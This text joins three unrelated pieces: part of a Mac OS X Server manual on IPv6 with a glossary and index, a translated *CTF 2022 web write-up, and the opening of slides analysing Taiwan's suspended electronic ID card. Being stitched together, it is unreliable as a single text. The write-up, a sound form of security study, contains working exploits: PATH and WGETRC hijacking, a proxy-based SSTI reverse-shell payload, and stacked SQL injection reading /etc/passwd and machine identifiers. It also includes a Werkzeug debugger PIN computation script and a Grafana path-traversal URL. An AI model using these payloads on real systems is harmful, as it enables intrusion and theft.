will fail if entered into address fields in Server Admin.
IPv6 Addresses
IPv6 addresses are different from IPv4 addresses. The change brings changes in
address notation, reserved addresses, the addressing model, and address types.
Notation
While IPv4 addresses are 4 bytes long and expressed in decimal, IPv6 addresses are 16
bytes long and can be expressed in a number of ways.
IPv6 addresses are generally written in the following form:
xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx
Pairs of IPv6 bytes are separated by a colon and each byte is represented as a pair of
hexadecimal digits, as in the following example:
E3C5:0000:0000:0000:0000:4AC8:C0A8:6420
or
E3C5:0:0:0:0:4AC8:C0A8:6420
IPv6 addresses often contain many bytes with a zero value, so a shorthand notation is
available. The shorthand notation removes the zero values from the text representation
and puts the colons next to each other, as follows:
E3C5::4AC8:C0A8:6420
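You can check that the zero-filled and shorthand spellings name the same address with Python’s ipaddress module — an outside tool used here purely for illustration, not one of the utilities shipped with Mac OS X Server:

```shell
#!/bin/sh
# Confirm the long and shorthand notations are equivalent, and convert
# between them, using Python's ipaddress module.
python3 - <<'EOF'
import ipaddress

full  = ipaddress.ip_address("E3C5:0000:0000:0000:0000:4AC8:C0A8:6420")
short = ipaddress.ip_address("E3C5::4AC8:C0A8:6420")

print(full == short)      # the two spellings name one address
print(short.exploded)     # fully written-out form
print(full.compressed)    # shorthand form
EOF
```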
The final notation type includes IPv4 addresses. Because many IPv6 addresses are
extensions of IPv4 addresses, the right-most four bytes of an IPv6 address (the right-
most two byte pairs) can be rewritten in the IPv4 notation. This mixed notation (from
the above example) could be expressed as:
E3C5::4AC8:192.168.100.32
IPv6 Reserved Addresses
IPv6 reserves two addresses that network nodes can’t use for their own communication
purposes:
0:0:0:0:0:0:0:0 (unspecified address, internal to the protocol)
0:0:0:0:0:0:0:1 (loopback address, just like 127.0.0.1 in IPv4)
IPv6 Addressing Model
IPv6 addresses are assigned to interfaces (for example, your Ethernet card), and not
nodes (for example, your computer). A single interface can be assigned multiple IPv6
addresses. Also, a single IPv6 address can be assigned to several interfaces for load
sharing. Finally, routers don’t need an IPv6 address, eliminating the need to configure
routers for point-to-point unicasts. Additionally, IPv6 doesn’t use IPv4 address
classes.
IPv6 Address Types
IPv6 supports the following three IP address types:
• Unicast (one to one communication)
• Multicast (one to many communication)
• Anycast (one to any one of many communication)
Note that IPv6 does not support broadcast; multicast is used instead. Otherwise,
unicast and multicast in IPv6 are the same as in IPv4. Multicast addresses in IPv6 start
with “FF” (255).
Anycast is a variation of multicast. While multicast delivers messages to all nodes in the
multicast group, anycast delivers messages to any one node in the multicast group.
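The “starts with FF” rule for multicast addresses can also be checked with Python’s ipaddress module — again an outside tool, used here only as an illustration:

```shell
#!/bin/sh
# An FF-prefixed address is multicast; an ordinary unicast address is not.
python3 - <<'EOF'
import ipaddress
print(ipaddress.ip_address("FF02::1").is_multicast)
print(ipaddress.ip_address("E3C5::4AC8:C0A8:6420").is_multicast)
EOF
```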
Where to Find More Information
The working group for the Internet Protocol Version 6 website is www.ipv6.org.
A group of IPv6 enthusiasts maintains a list of applications that support IPv6 at the
website www.ipv6forum.com/navbar/links/v6apps.htm.
Request For Comment Documents
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at the website www.faqs.org/rfcs.
There are over 29 IPv6 related RFC documents. A list can be found at
http://www.ipv6.org/specs.html
Glossary
This glossary defines terms and spells out abbreviations you may encounter while
working with online help or the Mac OS X Server Network Services Administration for
Version 10.3 or Later manual. References to terms defined elsewhere in the glossary
appear in italics.
bit A single piece of information, with a value of either 0 or 1.
broadcast The process of transmitting one copy of a stream over the whole network.
byte Eight bits.
DHCP (Dynamic Host Configuration Protocol) A protocol used to distribute IP
addresses to client computers. Each time a client computer starts up, the protocol looks
for a DHCP server and then requests an IP address from the DHCP server it finds. The
DHCP server checks for an available IP address and sends it to the client computer
along with a lease period—the length of time the client computer may use the address.
directory services Services that provide system software and applications with
uniform access to directory domains and other sources of information about users and
resources.
DNS (Domain Name System) A distributed database that maps IP addresses to
domain names. A DNS server, also known as a name server, keeps a list of names and
the IP addresses associated with each name.
DoS (denial of service) attack An Internet attack that uses thousands of network pings
to prevent the legitimate use of a server.
dynamic IP address An IP address that is assigned for a limited period of time or until
the client computer no longer needs the IP address.
filter A “screening” method used to control access to your server. A filter is made up of
an IP address and a subnet mask, and sometimes a port number and access type. The
IP address and the subnet mask together determine the range of IP addresses to which
the filter applies.
firewall Software that protects the network applications running on your server. IP
firewall service, which is part of Mac OS X Server software, scans incoming IP packets
and rejects or accepts these packets based on a set of filters you create.
FTP (File Transfer Protocol) A protocol that allows computers to transfer files over a
network. FTP clients using any operating system that supports FTP can connect to a file
server and download files, depending on their access privileges. Most Internet browsers
and a number of freeware applications can be used to access an FTP server.
HTTP (Hypertext Transfer Protocol) The client/server protocol for the World Wide Web.
The HTTP protocol provides a way for a web browser to access a web server and
request hypermedia documents created using HTML.
IANA (Internet Assigned Numbers Authority) An organization responsible for
allocating IP addresses, assigning protocol parameters, and managing domain names.
ICMP (Internet Control Message Protocol) A message control and error-reporting
protocol used between host servers and gateways. For example, some Internet
software applications use ICMP to send a packet on a round-trip between two hosts to
determine round-trip times and discover problems on the network.
IGMP (Internet Group Management Protocol) An Internet protocol used by hosts and
routers to send packets to lists of hosts that want to participate, in a process known as
multicasting. QuickTime Streaming Server (QTSS) uses multicast addressing, as does
Service Location Protocol (SLP).
IP (Internet Protocol) Also known as IPv4. A method used with Transmission Control
Protocol (TCP) to send data between computers over a local network or the Internet. IP
delivers packets of data, while TCP keeps track of data packets.
IP address A unique numeric address that identifies a computer on the Internet.
IP subnet A portion of an IP network, which may be a physically independent network
segment, that shares a network address with other portions of the network and is
identified by a subnet number.
IPSec A security addition to IP. A protocol that provides data transmission security for
L2TP VPN connections. IPSec acts at the network layer, protecting and authenticating IP
packets between participating IPSec nodes.
IPv6 (Internet Protocol Version 6) The next generation communication protocol to
replace IP (also known as IPv4). IPv6 allows a greater number of network addresses and
can reduce routing loads across the Internet.
ISP (Internet service provider) A business that sells Internet access and often provides
web hosting for ecommerce applications as well as mail services.
L2TP (Layer Two Tunnelling Protocol) A network transport protocol used for VPN
connections. It is essentially a combination of Cisco’s L2F and PPTP. L2TP itself is not an
encryption protocol, so it uses IPSec for packet encryption.
LAN (local area network) A network maintained within a facility, as opposed to a WAN
(wide area network) that links geographically separated facilities.
LDAP (Lightweight Directory Access Protocol) A standard client-server protocol for
accessing a directory domain.
lease period A limited period of time during which IP addresses are assigned. By using
short leases, DHCP can reassign IP addresses on networks that have more computers
than available IP addresses.
load balancing The process of distributing the demands by client computers for
network services across multiple servers in order to optimize performance by fully
utilizing the capacity of all available servers.
local domain A directory domain that can be accessed only by the computer on which
it resides.
Mac OS X The latest version of the Apple operating system. Mac OS X combines the
reliability of UNIX with the ease of use of Macintosh.
Mac OS X Server An industrial-strength server platform that supports Mac, Windows,
UNIX, and Linux clients out of the box and provides a suite of scalable workgroup and
network services plus advanced remote management tools.
mail host The computer that provides your mail service.
Manual Unicast A method for transmitting a live stream to a single QuickTime Player
client or to a computer running QTSS. An SDP file is usually created by the broadcaster
application and then must be manually sent to the viewer or streaming server.
master zone The DNS zone records held by a primary DNS server. A master zone is
replicated by zone transfers to slave zones on secondary DNS servers.
MS-CHAPv2 (Microsoft’s Challenge Handshake Authentication Protocol version 2)
The standard Windows authentication scheme for VPN. This authentication method
encodes passwords when they are sent over the network and stores them in a
scrambled form on the server. It offers good security during network transmission.
multicast An efficient, one-to-many form of streaming. Users can join or leave a
multicast but cannot otherwise interact with it.
multihoming The ability to support multiple network connections. When more than
one connection is available, Mac OS X selects the best connection according to the
order specified in Network preferences.
MX record (mail exchange record) An entry in a DNS table that specifies which
computer manages mail for an Internet domain. When a mail server has mail to deliver
to an Internet domain, the mail server requests the MX record for the domain. The
server sends the mail to the computer specified in the MX record.
name server See DNS (Domain Name System).
NAT (Network Address Translation) A method of connecting multiple computers
to the Internet (or any other IP network) using one IP address. NAT converts the IP
addresses you assign to computers on your private, internal network into one
legitimate IP address for Internet communications.
network interface Your computer’s hardware connection to some network. This
includes (but is not limited to) Ethernet connections, AirPort cards, and FireWire
connections.
node A processing location. A node can be a computer or some other device, such as
a printer. Each node has a unique network address.
NTP (network time protocol) A network protocol used to synchronize the clocks of
computers across a network to some time reference clock. NTP is used to ensure that
all the computers on a network are reporting the same time.
Open Directory The Apple directory services architecture, which can access
authoritative information about users and network resources from directory domains
that use LDAP, NetInfo, or Active Directory protocols; BSD configuration files; and
network services.
open relay A server that receives and automatically forwards mail to another server.
Junk mail senders exploit open relay servers to avoid having their own mail servers
blacklisted as sources of spam.
packet A unit of data information consisting of header, information, error detection,
and trailer records. QTSS uses TCP, UDP, and IP packets to communicate with streaming
clients.
port A sort of virtual mail slot. A server uses port numbers to determine which
application should receive data packets. Firewalls use port numbers to determine
whether or not data packets are allowed to traverse a local network. “Port” usually
refers to either a TCP or UDP port.
protocol A set of rules that determines how data is sent back and forth between two
applications.
PTR (pointer) record A DNS record type that translates IP (IPv4) addresses to domain
names. Used in DNS reverse lookups.
QTSS (QuickTime Streaming Server) A technology that lets you deliver media over the
Internet in real time.
record type A specific category of records, such as users, computers, and mounts. For
each record type, a directory domain may contain any number of records.
recursion The process of fully resolving domain names into IP addresses. A
nonrecursive DNS query allows referrals to other DNS servers to resolve the address. In
general, user applications depend on the DNS server to perform this function, but
other DNS servers do not have to perform a recursive query.
Rendezvous A protocol developed by Apple for automatic discovery of computers,
devices, and services on IP networks. This proposed Internet standard protocol is
sometimes referred to as “ZeroConf” or “multicast DNS.” For more information, visit
www.apple.com or www.zeroconf.org.
scope A group of services. A scope can be a logical grouping of computers, such as all
computers used by the production department, or a physical grouping, such as all
computers located on the first floor. You can define a scope as part or all of your
network.
search path See search policy.
search policy A list of directory domains searched by a Mac OS X computer when it
needs configuration information; also the order in which domains are searched.
Sometimes called a search path.
shared secret A value defined at each node of an L2TP VPN connection that serves as
the encryption key seed to negotiate authentication and data transport connections.
slave zone The DNS zone records held by a secondary DNS server. A slave zone
receives its data by zone transfers from the master zone on the primary DNS server.
SLP (Service Location Protocol) DA (Directory Agent) A protocol that registers
services available on a network and gives users easy access to them. When a service is
added to the network, the service uses SLP to register itself on the network. SLP/DA
uses a centralized repository for registered network services.
SMTP (Simple Mail Transfer Protocol) A protocol used to send and transfer mail. Its
ability to queue incoming messages is limited, so SMTP usually is used only to send
mail, and POP or IMAP is used to receive mail.
spam Unsolicited email; junk mail.
SSL (Secure Sockets Layer) An Internet protocol that allows you to send encrypted,
authenticated information across the Internet.
static IP address An IP address that is assigned to a computer or device once and is
never changed.
Stratum 1 An Internet wide, authoritative Network Time Protocol (NTP) server that
keeps track of the current UTC time. Other stratums are available (2, 3, and so forth);
each takes its time from a lower-numbered stratum server.
subnet A grouping on the same network of client computers that are organized by
location (different floors of a building, for example) or by usage (all eighth-grade
students, for example). The use of subnets simplifies administration.
TCP (Transmission Control Protocol) A method used along with the Internet Protocol
(IP) to send data in the form of message units between computers over the Internet. IP
takes care of handling the actual delivery of the data, and TCP takes care of keeping
track of the individual units of data (called packets) into which a message is divided for
efficient routing through the Internet.
TTL (time-to-live) The specified length of time that DNS information is stored in a
cache. When a domain name–IP address pair has been cached longer than the TTL
value, the entry is deleted from the name server’s cache (but not from the primary DNS
server).
TXT (text) record A DNS record type that stores a text string for a response to a DNS
query.
UCE (unsolicited commercial email) See spam.
UDP (User Datagram Protocol) A communications method that uses the Internet
Protocol (IP) to send a data unit (called a datagram) from one computer to another in a
network. Network applications that have very small data units to exchange may use
UDP rather than TCP.
unicast The one-to-one form of streaming. If RTSP is provided, the user can move
freely from point to point in an on-demand movie.
UTC (universal time coordinated) A standard reference time. UTC is based on an
atomic resonance, and clocks that run according to UTC are often called “atomic
clocks.”
VPN (Virtual Private Network) A network that uses encryption and other technologies
to provide secure communications over a public network, typically the Internet. VPNs
are generally cheaper than real private networks using private lines but rely on having
the same encryption system at both ends. The encryption may be performed by
firewall software or by routers.
WAN (wide area network) A network maintained across geographically separated
facilities, as opposed to a LAN (local area network) within a facility. Your WAN interface
is usually the one connected to the Internet.
wildcard A range of possible values for any segment of an IP address.
WINS (Windows Internet Naming Service) A name resolution service used by
Windows computers to match client names with IP addresses. A WINS server can be
located on the local network or externally on the Internet.
zone transfer The method by which zone data is replicated among authoritative DNS
servers. Slave DNS servers request zone transfers from their master servers to acquire
their data.
Index
A
AirPort Base Stations
DHCP service and 9
B
BIND 17, 18, 19, 37–40
about 37
configuration File 38
configuring 37–40
defined 37
example 38–40
load distribution 36
zone data files 38
C
CIDR netmask notation 45, 47
D
DHCP servers 8, 40
interactions 9
network location 8
DHCP service 7–16
AirPort Base Stations 9
changing subnets 11
deleting subnets 12
described 7
disabling subnets 14
DNS options 12
DNS Server for DHCP Clients 12
LDAP auto-configuration 9
LDAP options for subnets 13
logs 15
logs for 10
managing 10–14
more information 16
preparing for setup 7–9
setting up 9–10
starting and stopping 10
subnet IP address lease times, changing 12
subnets 8
subnets, creating 10
subnet settings 11
uses for 7
viewing client lists 15
viewing leases, client list 15
WINS options for subnets 14
DNS service 17–41
configuring BIND 37–40
described 17
dynamic IP addresses 40–41
load distribution 36
managing 21–30
more information 41
options for DHCP subnets 12
planning 18
preparing for setup 18
servers 18
setting up 18
setup overview 18–20
starting 21
stopping 21
strategies 18–20
usage statistics 29
uses for 17
with mail service 33
domain names
registering 18, 19
DoS (Denial of Service) attacks
preventing 59
dynamic DNS 40–41
Dynamic Host Configuration Protocol
See DHCP
dynamic IP addresses 8
F
filters
editing 54
examples 57–58
filters, IP
adding 48
described 45
H
help 6
I
IANA registration 18
In 6
Internet Gateway Multicast Protocol See IGMP
Internet Protocol Version 6 See IPv6
IP addresses
assigning 9
DHCP and 7
DHCP lease times, changing 12
dynamic 8
dynamic allocation 8
IPv6 notation 84
leasing with DHCP 7
multiple 47
precedence in filters 47
ranges 47
reserved 9
static 8
IP Filter module 61–63
IP filter rules 61
IP Firewall
starting and stopping 14
IP Firewall service 43–44
about 43
adding filters 48
Any Port filter 54
background 45
benefits 44
configuring 49–58
creating filters 51
default filter 54
described 43
editing filters 54
example filters 57–58
filters 45–47
IP filter rules 61–63
logs, setting up 55–56
managing 49–59
more information 66
multiple IP addresses 47
NAT packet divert 68
planning 48
port reference 63–65
preparing for setup 45–47
preventing Denial of Service (DoS) attacks 59
setting up 48–49
starting, stopping 49
uses for 44
viewing logs 55
ipfw command 61–63
IPv6
addressing 84–85
address notation 84
available services 84
in Server Admin 84
more information 86
L
load distribution 36
logging items
DHCP activity 10
logs
DHCP 15
DNS service 28
IP Firewall service 55–56
M
Mac OS X Server
ports used by 63–65
setting up 6
Mac OS X Server Getting Started 6
Mac OS X systems 63–65
mail
redirecting 33
Mail Exchange. See MX
mail exchangers 33
mail servers 33
mail service
using DNS service with 33
MX (Mail Exchange) records 20, 33
MX hosts 33
N
named.conf file 38
name servers 18
NAT
about 67
activity monitor 68
configuring 68
monitoring 68
more information 69
packet divert 68
starting, stopping 67
status overview 68
troubleshooting 68
NetBoot
viewing client lists 15
networks
private 36–37
TCP/IP networks 36–37
NTP
about 79
configuring clients 81
more information 81
setting up 80
time system 79
O
online help 6
P
ports
Mac OS X computers 63–65
TCP ports 63–64
UDP ports 65
R
round robin 36
rules, IP filter 61–63
S
Server 10, 15, 57, 58, 69
servers
DHCP servers 40
name servers 18
static IP addresses 8
Stratum time servers 79
subnet masks 45
subnets 8
creating 8, 10
T
TCP/IP
private networks 36–37
TCP ports 63–65
Terminal application 62
time servers
Stratum 79
U
UDP ports 65
Universal Time Coordinated (UTC) 79
User Datagram Protocol See UDP
V
VPN
client connections 77
logging 76
routing definitions 75
viewing logs 77
viewing status 76
2022*CTF-Web
Preface

The XCTF international series has always been solid. I played this round over the weekend; even without any Java challenges it was still quite interesting overall.
The write-ups below are not in challenge order — sorry, not in the official order; they are simply ranked from most to least interesting in my view. I also backed up the source of the challenges that provided it.
oh-my-lotto
Link: https://pan.baidu.com/s/1G53aYqIIbHGlowdWFhkKqw  Extraction code: oism
oh-my-lotto
One of the more fun challenges in my book — reborn as the God of Gamblers.
My solution was unintended, which is why a revenge version was released later. Let's briefly analyze the challenge, starting with the Docker setup to get a feel for the overall structure:
version: "3"
services:
  lotto:
    build:
      context: lotto/
      dockerfile: Dockerfile
    container_name: "lotto"
  app:
    build:
      context: app/
      dockerfile: Dockerfile
    links:
      - lotto
    container_name: "app"
    ports:
      - "8880:8080"

Next, the code. There are three routes; from shortest to longest:

The /result route returns the contents of /app/lotto_result.txt:

@app.route("/result", methods=['GET'])
def result():
    if os.path.exists("/app/lotto_result.txt"):
        lotto_result = open("/app/lotto_result.txt", 'rb').read().decode()
    else:
        lotto_result = ''
    return render_template('result.html', message=lotto_result)

The /forecast route lets you upload a file, which is saved to /app/guess/forecast.txt:

@app.route("/forecast", methods=['GET', 'POST'])
def forecast():
    message = ''
    if request.method == 'GET':
        return render_template('forecast.html')
    elif request.method == 'POST':
        if 'file' not in request.files:
            message = 'Where is your forecast?'
        else:
            file = request.files['file']
            file.save('/app/guess/forecast.txt')
            message = "OK, I get your forecast. Let's Lotto!"
        return render_template('forecast.html', message=message)

Finally there is the key /lotto route (too long to paste in full): if the forecast you uploaded equals the value randomly generated by the environment, you get the flag.
@app.route("/lotto", methods=['GET', 'POST'])
def lotto():
    ...
    elif request.method == 'POST':
        # the flag is read from an environment variable
        flag = os.getenv('flag')
        lotto_key = request.form.get('lotto_key') or ''
        lotto_value = request.form.get('lotto_value') or ''
        lotto_key = lotto_key.upper()
        if safe_check(lotto_key):
            os.environ[lotto_key] = lotto_value
        try:
            # fetch the drawn numbers from the internal http://lotto service
            os.system('wget --content-disposition -N lotto')
            if os.path.exists("/app/lotto_result.txt"):
                lotto_result = open("/app/lotto_result.txt", 'rb').read()
            else:
                lotto_result = 'result'
            if os.path.exists("/app/guess/forecast.txt"):
                forecast = open("/app/guess/forecast.txt", 'rb').read()
            else:
                forecast = 'forecast'
            if forecast == lotto_result:
                return flag

The internal lotto page, as its code shows, simply generates 20 random numbers below 40 and returns them as an attachment:

@app.route("/")
def index():
    lotto = []
    for i in range(1, 20):
        n = str(secrets.randbelow(40))
        lotto.append(n)
    r = '\n'.join(lotto)
    response = make_response(r)
    response.headers['Content-Type'] = 'text/plain'
    response.headers['Content-Disposition'] = 'attachment; filename=lotto_result.txt'
    return response

if __name__ == "__main__":
    app.run(debug=True, host='0.0.0.0', port=80)

Meanwhile the environment variable key we control is filtered by safe_check, so the direct environment-variable RCE trick p牛 wrote about before does not work:

def safe_check(s):
    if 'LD' in s or 'HTTP' in s or 'BASH' in s or 'ENV' in s or 'PROXY' in s or 'PS' in s:
        return False
    return True
Since the challenge returns the flag only when the forecast matches, is there anything we can control? This is where PATH comes in.
The PATH variable holds the list of directories to search for executables: if the program to run is not in the current directory, the OS walks the directories recorded in PATH one by one and runs the program from the first directory where it is found, provided it has execute permission.
So the plan is simple: if we overwrite the PATH environment variable so that wget can no longer be found, wget --content-disposition -N lotto fails and the download never happens, and /app/lotto_result.txt keeps the value that was randomly generated on the very first visit.
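The effect is easy to demonstrate locally. This is just a sketch — shutil.which performs the same PATH search the shell does when resolving "wget":

```python
import shutil

# With PATH pointing at a directory that holds no executables,
# the lookup fails, so os.system('wget ...') in the app would
# error out instead of overwriting lotto_result.txt.
found = shutil.which("wget", path="/nonexistent")
print(found)  # None
```
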
1. Visit /lotto once so the first result is generated
2. Visit /result and save the returned numbers
3. Overwrite PATH, upload the saved numbers as the forecast, and visit /lotto again

As the screenshot showed, we really do get the flag; res.txt is the result the environment generated on the first request.
oh-my-lotto-revenge

The fix: even when the forecast is correct the flag is no longer returned, so we have to go for RCE instead.

if forecast == lotto_result:
    return "You are right!But where is flag?"
else:
    message = 'Sorry forecast failed, maybe lucky next time!'
    return render_template('lotto.html', message=message)

Start by reading the wget documentation: https://www.gnu.org/software/wget/manual/wget.html#:~:text=6.1-,Wgetrc%20Location,-When%20initializing%2C%20Wget
There is a WGETRC variable: if we can control environment variables, we can manipulate wget's options, and there are plenty of interesting ones.
Two of them did the job for me. The first is http_proxy: obviously, if it is configured, the request that would go straight to http://lotto is routed through us first, so we can act as a man in the middle.

http_proxy = string
Use string as HTTP proxy, instead of the one specified in environment.

A quick experiment: after setting it and running wget again, our server successfully receives the request.
Since we now control the response body, can we also control where it is written? output_document does exactly that; it is equivalent to the -O option:

output_document = file
Set the output filename—the same as ‘-O file’.

So we overwrite index.html with an SSTI payload. The content written to the WGETRC file is:

http_proxy=http://xxxxx
output_document = templates/index.html

and the controlled response body is:

{{config.__class__.__init__.__globals__['os'].popen('reverse shell command').read()}}
import requests

def web():
    url = "http://xxx/"
    r = requests.post(url + "forecast",
        files={'file': open("/Users/y4tacker/PycharmProjects/pythonProject/lottt/y4.txt", "rb")})
    data = {
        "lotto_key": "WGETRC",
        "lotto_value": "/app/guess/forecast.txt"
    }
    r = requests.post(url + "lotto", data=data)
    print(r.text)

if __name__ == '__main__':
    web()
oh-my-notepro

Ugh, black-box again. So annoying.
After logging in there is only one feature: creating notes. I first threw various SSTI payloads at it with no reaction, then guessed I might need to obtain admin's note id; but an id as long and ugly as 0pn2jtgnfer9zaijadymsmq347eqmay3 clearly cannot be brute-forced. So, SQL injection: the classic single quote produces an error.
The echo shows five columns, but with a payload that simple, and this being XCTF, there is no way a plain injection just dumps the flag from the database (an unfiltered injection would be far too easy); and indeed there is no flag, not even an admin user.
Reading files with load_file failed too. Next I wanted to look at some configuration. Usually you read it with something like show variables like 'xxx', but you can also fetch global variables directly in a query:

select @@global.secure_file_priv

Fine, you really give me nothing.
Then I noticed local_infile is enabled. If you don't know what that means, see the article "CSS-T | Mysql Client 任意文件读取攻击链拓展" (MySQL client arbitrary file read attack chain).
Regular injection clearly cannot exploit this; only one thing fits the bill: stacked queries. A quick check:

http://123.60.72.85:5002/view?note_id=0' union select 1,2,3,4,5;select sleep(2)--+

The page really does delay, confirming the guess. Next, read a file:

http://123.60.72.85:5002/view?note_id=0' union select 1,2,3,4,5; create table y4(t text); load data local infile '/etc/passwd' INTO TABLE y4 LINES TERMINATED BY '\n'--+

It works, bro.
So only one road to RCE is left: we already have the debug error page, so let's compute the Werkzeug PIN. That needs:
1. the username Flask runs as
2. modname, normally fixed to flask.app
3. getattr(app, "__name__", app.__class__.__name__), fixed, normally Flask
4. the absolute path of app.py inside the flask package, leaked by the error page
5. the decimal form of the machine's MAC address
6. the docker machine id
I copied a script off the internet and it did not work, so I took a quick look at where Flask generates the PIN, in python3.8/site-packages/werkzeug/debug/__init__.py#get_pin_and_cookie_name, and found that since Python 3.8 the hash changed from MD5 to SHA-1.
So just write a quick exploit script:
import requests
import re
import hashlib
from itertools import chain

url = "http://124.70.185.87:5002/view?note_id="
payload1 = "0' union select 1,2,3,4,5; create table y4(t text); load data local infile '/sys/class/net/eth0/address' INTO TABLE y4 LINES TERMINATED BY '\\n'--+"
payload2 = "0' union select 1,2,3,4,5; create table yy4(t text); load data local infile '/proc/self/cgroup' INTO TABLE yy4 LINES TERMINATED BY '\\n'--+"
payload3 = "0' union select 1,2,3,(select group_concat(t) from y4),1; --+"
payload4 = "0' union select 1,2,3,(select group_concat(t) from yy4),1; --+"
headers = {
    "cookie": "session=.eJwVi0EKwyAQAL8ie8mlEE3ArP1MWXdXCE21REsJpX-POcxlhvkB1z09WnlqhjvMkwvKHBktRmfD5J1NKj5EXBDZeppVAi5wg0_VPdNL-7UVEiPUyKw5rZuaYdTG45tq_crQZSumUezhOKRewP8E760nRw.YlqN-g.KZrp8S7tsXPS60cPH88awzRI35Q"
}
r = requests.get(url + payload1, headers=headers)
r = requests.get(url + payload2, headers=headers)

probably_public_bits = [
    'ctf',  # username, from /etc/passwd
    'flask.app',  # default value
    'Flask',  # default value
    '/usr/local/lib/python3.8/site-packages/flask/app.py'  # leaked by the error page
]
private_bits = [
    str(int(re.search('</h1><pstyle="text-align:center">(.*?)</p></ul>',
        requests.get(url + payload3, headers=headers).text.replace("\n", "").replace(" ", "")
        ).groups()[0].replace(':', ''), 16)),  # /sys/class/net/eth0/address, hex to decimal
    '1cc402dd0e11d5ae18db04a6de87223d' + re.search('</h1><pstyle="text-align:center">(.*?)</p></ul></body></body></html>',
        requests.get(url + payload4, headers=headers).text.replace("\n", "").replace(" ", "")
        ).groups()[0].split(",")[0].split("/")[-1]  # /etc/machine-id + /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
print(rv)

oh-my-grafana

It had been publicly reported to have an arbitrary file read. Not knowing which plugins were installed, a quick fuzz found one, and I skimmed the docs to see which configuration files were worth reading:

/public/plugins/alertGroups/../../../../../../../../etc/passwd
First the sqlite database: I dumped it hoping to crack the admin password, tried a lot, no luck; clearly I do not understand cryptography.
But then I read grafana.ini, which leaked the credentials, and the login actually worked.
The admin panel has nothing, except a place to add a data source. That part looked commented out, yet the connection really succeeded.
From there it is arbitrary SQL execution and game over; nothing difficult.
Analysis Experience of the Suspended EID Card

Speaker: Shi-Cho Cha
Dept. of Information Management, NTUST, Chairman and Professor
Taiwan Information Security Center, Director

Background
https://www.ris.gov.tw/apply-idCard/app/idcard/IDCardReissue/main
https://www.ris.gov.tw/app/portal/789

Current Status: Suspended
https://www.ithome.com.tw/news/142375

Outline
Information Collection
Learning How it Works?
Identifying Potential Vulnerabilities
Key Findings
Recommendation

Information Collection
https://www.ris.gov.tw/app/portal/789
Hardware Architecture (figure): the chip stacks a crypto library, a card OS, and an applet (EAC+SAC). The hardware, crypto library, and card OS are Common Criteria certified at EAL6+, the applet at EAL5+. Interfaces follow ISO/IEC 7816 (contact), ISO/IEC 14443 (contactless), ISO 7816-4, and ICAO 9303.

The card data is divided into four zones: Household Registration Address Zone, Public Data Zone, Encrypted Data Zone, and Citizen Digital Certificate Zone.
Household Registration Address Zone: Household Registration Address (down to village and neighborhood). No access control; readable over both the contact and contactless interfaces.

Public Data Zone: Name, National ID No., Birthday, Household Registration Address, Compulsory Military Service Status, Marriage Status, Card ID No., Date of Replacement, Date of Issue, Photo (300 dpi). Protected by ICAO SAC (Supplemental Access Control) with MRZ or CAN; readable over both the contact and contactless interfaces.

Encrypted Data Zone: Spouse Name, Father's Name, Mother's Name, Place of Birth, Gender. Protected by ICAO EAC (Extended Access Control) + TA + PIN1; per the design table, contact interface only.

Citizen Digital Certificate Zone: Name, last four digits of the National ID No., certificate serial number, certificate validity dates. Protected by PIN2; contact interface only.
ICAO Doc 9303
• Machine Readable Travel Documents Eighth Edition, 2021
• Part 1: Introduction
• Part 2: Specifications for the Security of the Design, Manufacture and Issuance of MRTDs
• Part 3: Specifications Common to all MRTDs
• Part 4: Specifications for Machine Readable Passports (MRPs) and other TD3 Size MRTDs
• Part 5: Specifications for TD1 Size Machine Readable Official Travel Documents (MROTDs)
• Part 6: Specifications for TD2 Size Machine Readable Official Travel Documents (MROTDs)
• Part 7: Machine Readable Visas
• Part 8: Emergency Travel Documents
• Part 9: Deployment of Biometric Identification and Electronic Storage of Data in eMRTDs
• Part 10: Logical Data Structure (LDS) for Storage of Biometrics and Other Data in the
Contactless Integrated Circuit (IC)
• Part 11: Security Mechanisms for MRTDs
• Part 12: Public Key Infrastructure for MRTDs
• Part 13: Visible Digital Seals
https://www.icao.int/Meetings/TAG-MRTD/Documents/Tag-Mrtd-20/TagMrtd-20_Pres_TD-1_Broekhaar-wp20.pdf
TD1
TD2
TD3
By Bundesrepublik Deutschland, Bundesministerium des Innern. - PRADO, Public Domain, https://commons.wikimedia.org/w/index.php?curid=80366059
https://www.icao.int/Security/FAL/TRIP/PublishingImages/Pages/Publications/Guidelines%20-%20VDS%20for%20Travel-Related%20Public%20Health%20Proofs.pdf
Visa
Visa with Digital Seal
Learning How it Works?

An additional HiCOS application needs to be installed here.
You can read the Household Registration Address Zone directly.
You need the MRZ or CAN to read the Public Data Zone.
Reading the Encrypted Data Zone is much more complicated.
Capture the USB packets with Wireshark and USBPcap.
The test standard is the best resource for learning how things normally work.
I usually start with the SELECT (00:A4) command.
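As a concrete example, here is a minimal sketch of building that first command: a SELECT-by-AID APDU for the LDS1 eMRTD application, using the AID defined in ICAO 9303:

```python
# LDS1 eMRTD application identifier from ICAO 9303-10
AID = bytes.fromhex("A0000002471001")

def select_by_aid(aid: bytes) -> bytes:
    # CLA=00, INS=A4 (SELECT), P1=04 (select by DF name), P2=0C, Lc, data
    return bytes([0x00, 0xA4, 0x04, 0x0C, len(aid)]) + aid

apdu = select_by_aid(AID)
print(apdu.hex().upper())  # 00A4040C07A0000002471001
```
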
Select MF Root
LDS1 eMRTD Application
MF
(Master File)
ICAO 9303-10
LDS1 eMRTD Application
AID = ‘A0 00 00 02 47 10 01’
EF.CardAccess
(Short File
Identifier ‘1C’)
EF.DIR
(Short File
Identifier ‘1E’)
EF.ATR/INFO
(Short File
Identifier ‘01’)
EF.CardSecurity
(Short File
Identifier ‘1D’)
EF.COM
(Short File
Identifier ‘1E’)
EF.DG1
(Short File
Identifier ‘01’)
EF.DG3
(Short File
Identifier ‘03’)
EF.DG2
(Short File
